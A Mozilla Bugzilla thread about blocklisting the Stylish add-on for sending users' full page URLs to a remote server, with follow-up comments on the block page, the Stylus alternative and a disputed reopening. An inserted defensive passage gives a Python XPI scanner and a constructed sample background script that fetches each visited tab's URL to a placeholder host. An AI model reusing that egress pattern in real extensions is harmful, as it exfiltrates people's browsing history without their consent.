Closed Bug 1472948 Opened 6 years ago Closed 6 years ago

Blocklist Stylish add-on - sends full page urls to remote server

Categories: Toolkit :: Blocklist Policy Requests (defect)
Priority: Not set
Severity: normal
Status: RESOLVED FIXED
People: Reporter: mike.maccana, Assigned: TheOne

User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Build ID: 20180628175621

Steps to reproduce:

The 'Stylish' extension was recently sold and the new company now logs all browser history. 

https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/

This likely also affects Firefox. The extension is available on the extension store and also on https://addons.mozilla.org/en-GB/firefox/addon/stylish/?src=search and has 300K users.


Actual results:

Store my internet history


Expected results:

Didn't steal my internet history
Summary: Stylish extension is records all intrnet history and should be blocked / removed from extensions store / removed from FF → Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF
Component: Untriaged → Blocklisting
OS: Unspecified → All
Product: Firefox → Toolkit
Hardware: Unspecified → All
Summary: Stylish extension is records all history and should be blocked / removed from extensions store / removed from FF → Stylish extension records all history and should be blocked / removed from extensions store / removed from FF
Status: UNCONFIRMED → NEW
Ever confirmed: true
Summary: Stylish extension records all history and should be blocked / removed from extensions store / removed from FF → Blocklist Stylish add-on - sends full page urls to remote server
We decided to block because of violation of data practices outlined in the review policy.
Assignee: nobody → awagner
The block has been staged. Philipp, could you please review and approve?
Flags: needinfo?(philipp)
Done
Status: NEW → RESOLVED
Closed: 6 years ago
Flags: needinfo?(philipp)
Resolution: --- → FIXED
I see, with this bug, that Stylish is blocked, and why.

However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for "more information".  I have Stylish version 3.1.1

The URL for more information directs the user to:  https://blocked.cdn.mozilla.net/i19.html
That webpage refers to version 1.1b1 of Stylish, and a block request date of March 2011.  It does not refer to this bug 1472948, rather to the old bug 621660 from March 2011.
(In reply to john ruskin from comment #4)
> However, on ESR 52.8.1, the block incorrectly refers to the wrong bug for
> "more information".  
 I've filed https://bugzilla.mozilla.org/show_bug.cgi?id=1473194 for this as it might be an orthogonal concern to this bug.
The correct block page is https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

Which tells me "Why was it blocked? This add-on violates data practices outlined in the review policy."

As a user that's not particularly helpful. You've just disabled a feature of the browser that I liked, and justified that with a vague mention of "data practices". That won't mean much to most users. Are we able to rephrase / expand that so your average person understands why they can't use Stylish any more?

Additionally there is no suggested action, other than to live without the feature that the extension offered. Could we point users to https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish fork without the spyware?
Original reporter here: does this mean Stylish will get removed / cleaned from existing Firefox installations?
(In reply to mike.maccana from comment #7)
> Original reporter here: does this mean Stylish will get removed / cleaned
> from existing Firefox installations?

It will be disabled, not removed. Users will get a warning though with a request to (optionally) restart the browser.
(In reply to Peter Wu from comment #8)

Thanks Peter.
(In reply to Ian Thomas ('thelem') from comment #6)
> Additionally there is no suggested action, other than to live without the
> feature that the extension offered. Could we point users to
> https://addons.mozilla.org/en-GB/firefox/addon/styl-us/ which is a Stylish
> fork without the spyware?

I don't know whether that is permissible, but users definitely will need assistance. There already are a number of "what's going on" threads on the Stylish forums, but many users may not know about this site: https://forum.userstyles.org/categories/stylish
According to the linked article, Stylish has been stealing browser history data since January 2017. Mozilla and the user community are apparently just finding out about this now, a year and a half later. The extension has been in the system, displaying the offending behavior, the entire time.

I think there's a broader bug here, along the lines of "extensions can get away with malicious behavior for a long time without anyone noticing", or "it is possible and profitable to buy and maliciously monetize popular extensions", or even "extension developers don't get paid for their work and so have an incentive to sell out".
Thanks, people. 

(In reply to Peter Wu from comment #8)

> It will be disabled, not removed. …

No alert for legacy 2.1.1. This seems proper. 

Stylish 3.1.1 block-listed and disabled, 2.1.1 enabled : waterfox
<https://new.reddit.com/comments/8wd5wu/-/>

(In reply to Ian Thomas ('thelem') from comment #6)

> The correct block page is
> https://blocked.cdn.mozilla.net/c635229f-7aa0-44c5-914f-80c590949071.html

I was directed to <https://blocked.cdn.mozilla.net/i1900.html>. 

I guess that the two URLs are synonymous.

(In reply to jscher2000 from comment #10)

> … a number of "what's going on" threads on the Stylish forums, …

https://web.archive.org/web/*/https://forum.userstyles.org/discussion/67684/no-longer-available-on-amo captures the first.
Hi anovak, I think the relevant date is more recent. 

Stylish for Chrome first got the behavior of sending the current tab URL to the publisher to get script recommendations as an "opt out" feature. It was clear that for Firefox, it would have to be an "opt in" feature to comply with policy.

When the WebExtensions port was released around November 10, 2017, its default setting appears to have been correct, and there was not even an opt-in/opt-out checkbox. People who checked did not observe the api.userstyles.org calls in the Browser Console in version 3.0.1. I still have that XPI if anyone wants to check it: https://www.jeffersonscher.com/temp/Stylish301Fx/

Version 3.0.5 was released on April 24, 2018 -- I have no XPI or other information

Version 3.1.1 was released on May 23, 2018 -- coincidentally (?), the release was one day after SimilarWeb updated its privacy policy. This version has the impermissible opt-out feature from the Chrome extension -- user is automatically opted in to data sharing.

Since data sharing (exfiltration) is a policy (user consent) issue and not a specific function, I can't imagine how an automated review would catch the change. But flagging extensions that use fetch and XMLHttpRequest for human review could be helpful. Whether that would have caught this within the six weeks since 3.1.1 was released, I have no idea.
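The suggestion above, routing add-ons that use fetch or XMLHttpRequest to a human reviewer, can be approximated with a static triage pass over the XPI package. The script below is an added example written for this page, not Mozilla's review tooling and not code from Stylish: it opens an in-memory .xpi (a zip), scans every script for network-egress APIs and hard-coded remote hosts, and pairs that with tab-URL access and the manifest permissions that expose full page URLs. The sample add-on it scans, the placeholder host api.example.invalid, and the heuristics themselves are all constructed for illustration.

```python
"""Static triage of a Firefox WebExtension package (.xpi = zip) for code that
can send browsing data to a remote server.  Added example for this bug page,
not part of Mozilla's review tooling; the sample add-on and the heuristics are
constructed for illustration."""
import io
import json
import re
import zipfile
from urllib.parse import urlsplit

# APIs through which extension code can send data off the device.
NETWORK_CALLS = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon|WebSocket)\b")
# String literals holding absolute http(s) URLs -> candidate remote endpoints.
URL_LITERAL = re.compile(r"""["'`](https?://[^"'`\s]+)["'`]""")
# APIs that expose the URL of the page the user is visiting.
TAB_URL_ACCESS = re.compile(
    r"\btabs\.(onUpdated|onActivated|query|get)\b|\bwebNavigation\.\w+|\bwebRequest\.\w+"
)
# Manifest permissions that let those APIs return full URLs.
URL_PERMISSIONS = {"tabs", "<all_urls>", "webNavigation", "webRequest"}


def scan_xpi(xpi_bytes: bytes) -> dict:
    """Return a triage report for one XPI held in memory."""
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        manifest = json.loads(z.read("manifest.json"))
        findings = []
        for name in z.namelist():
            if not name.endswith((".js", ".mjs")):
                continue
            src = z.read(name).decode("utf-8", errors="replace")
            calls = sorted({m.group(1) for m in NETWORK_CALLS.finditer(src)})
            hosts = sorted({urlsplit(u).hostname for u in URL_LITERAL.findall(src)} - {None})
            if not calls and not hosts:
                continue  # no way to reach the network from this script
            findings.append({
                "file": name,
                "network_calls": calls,
                "remote_hosts": hosts,
                "reads_tab_url": bool(TAB_URL_ACCESS.search(src)),
            })
    perms = set(manifest.get("permissions", []))
    # Stricter signal: page-URL access and network egress in the same script,
    # with a permission that actually yields full URLs.
    exfil_risk = any(f["network_calls"] and f["reads_tab_url"] for f in findings) \
        and bool(perms & URL_PERMISSIONS)
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "url_permissions": sorted(perms & URL_PERMISSIONS),
        "findings": findings,
        # The proposal in the comment above: any fetch/XHR use goes to a human.
        "needs_human_review": bool(findings),
        "possible_history_exfiltration": exfil_risk,
    }


def build_sample_xpi() -> bytes:
    """Constructed sample add-on (not Stylish's code): its background script
    reports every completed navigation to a placeholder host."""
    manifest = {
        "manifest_version": 2,
        "name": "sample-style-manager",
        "version": "0.0.1",
        "permissions": ["tabs", "<all_urls>", "storage"],
        "background": {"scripts": ["background.js"]},
    }
    background_js = """
browser.tabs.onUpdated.addListener((tabId, info, tab) => {
  if (info.status !== "complete") return;
  // Sends the full page URL off-device on every navigation.
  fetch("https://api.example.invalid/recommend?url=" + encodeURIComponent(tab.url));
});
"""
    content_js = "document.documentElement.dataset.styled = '1';\n"  # no egress
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("manifest.json", json.dumps(manifest))
        z.writestr("background.js", background_js)
        z.writestr("content.js", content_js)
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(scan_xpi(build_sample_xpi()), indent=2))
```

Run it directly to print the report for the constructed sample: background.js is flagged for fetch plus a remote host, content.js is not, and the tabs/<all_urls> permissions turn the finding into a possible history-exfiltration signal. As the comment notes, the scan cannot decide consent; it only routes the add-on to a reviewer, who still has to check whether the egress is opt-in and disclosed.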
Previous versions of Stylish for Firefox did not include this behavior. A recent version did, and that is why it was blocked.

Stylus is an alternative, so feel free to recommend it to people. We are also in the process of providing more support to affected users.

Please post any additional questions in our discussion forum: https://discourse.mozilla.org/c/add-ons
Thank you, everyone, for the comments and inquiries you have made here. I understand this is an issue that brings up a lot of questions. At the same time, this is a bug tracker meant mostly for technical discussion around the actions taken.

Therefore, I am restricting comments to this bug. If you have further questions, please follow the link to our discussion forums Amy posted in the previous comment. Thank you for your understanding.
Restrict Comments: true
We have pushed a Heartbeat message to Stylish users, giving them Styl-us as an option.
Version: 62 Branch → unspecified
Stylish has just updated itself to a version that is no longer blocked. I've not been able to find any discussion that indicates it has been decided that the extension is now compliant, so it would appear they've used a loophole of the review process to get themselves re-enabled. Comments on discourse indicate that they have used this loophole multiple times and then been re-removed.

The new version is upfront about collecting "browser behaviour data" and you now must opt-in to "Access styles while you browse the web" before it will collect the tracking data. https://robertheaton.com/2018/08/16/stylish-is-back-and-you-still-shouldnt-use-it/ has a more in-depth view.

Are these changes enough to make the extension compliant? The Add-on policy at https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/AMO/Policy/Reviews#Data_Disclosure_Collection_and_Management states "You must disclose how the add-on collects, uses, stores and shares user data in the privacy policy field on AMO. Mozilla expects that the add-on limits data collection whenever possible, in keeping with Mozilla’s Lean Data Practices and Mozilla’s Data Privacy Principles, and uses the data only for the purpose for which it was originally collected."

The Stylish privacy policy at https://userstyles.org/login/policy states that they collect "Standard web server log information (i.e., page views)." to "support and enable the Stylish services (i.e., to understand how popular websites are in order for us to determine for which websites, and for which sections within each website, we will want to build and support Styles)."

In other words, Stylish are using the collected data to judge the relative popularity of websites among their user base. This is a different usage from the opt-in of "Access styles while you browse the web", so I would consider that the extension is still not compliant with the policy and the blocklist should remain.
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
What's relevant for us is the privacy policy on AMO: https://addons.mozilla.org/en-US/firefox/addon/stylish/privacy/

The Privacy Policy on their website might cover more than just the add-on.

Please do not reopen blocklist bugs that have been handled already.
Status: REOPENED → RESOLVED
Closed: 6 years ago
Resolution: --- → FIXED